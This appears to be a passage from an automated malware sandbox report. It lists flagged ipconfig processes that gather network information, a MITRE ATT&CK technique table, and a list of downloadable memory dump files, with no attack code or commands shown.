C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1552

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:860

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1856

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/340-65-0x0000000000000000-mapping.dmp

Download
memory/856-72-0x0000000000000000-mapping.dmp

Download
memory/860-89-0x0000000000000000-mapping.dmp

Download
memory/976-59-0x000007FEFBA61000-0x000007FEFBA63000-memory.dmp

Filesize
8KB

Download
memory/976-57-0x0000000000000000-mapping.dmp

Download
memory/1072-66-0x0000000000000000-mapping.dmp

Download
memory/1304-63-0x0000000000000000-mapping.dmp

Download
memory/1328-87-0x0000000000000000-mapping.dmp

Download
memory/1372-64-0x0000000000000000-mapping.dmp

Download
memory/1376-69-0x0000000000000000-mapping.dmp

Download
memory/1552-88-0x0000000000000000-mapping.dmp

Download
memory/1644-71-0x0000000000000000-mapping.dmp

Download
memory/1668-73-0x0000000000000000-mapping.dmp

Download
memory/1716-68-0x0000000000000000-mapping.dmp

Download
memory/1736-67-0x0000000000000000-mapping.dmp

Download
memory/1756-60-0x0000000075E51000-0x0000000075E53000-memory.dmp

Filesize
8KB

Download
memory/1756-54-0x0000000074221000-0x0000000074225000-memory.dmp

Filesize
16KB

Download
memory/1756-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1756-58-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download
memory/1756-55-0x0000000071251000-0x0000000071253000-memory.dmp

Filesize
8KB

Download
memory/1808-62-0x0000000000000000-mapping.dmp

Download
memory/1824-70-0x0000000000000000-mapping.dmp

Download
memory/1856-90-0x0000000000000000-mapping.dmp

Download
memory/1960-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads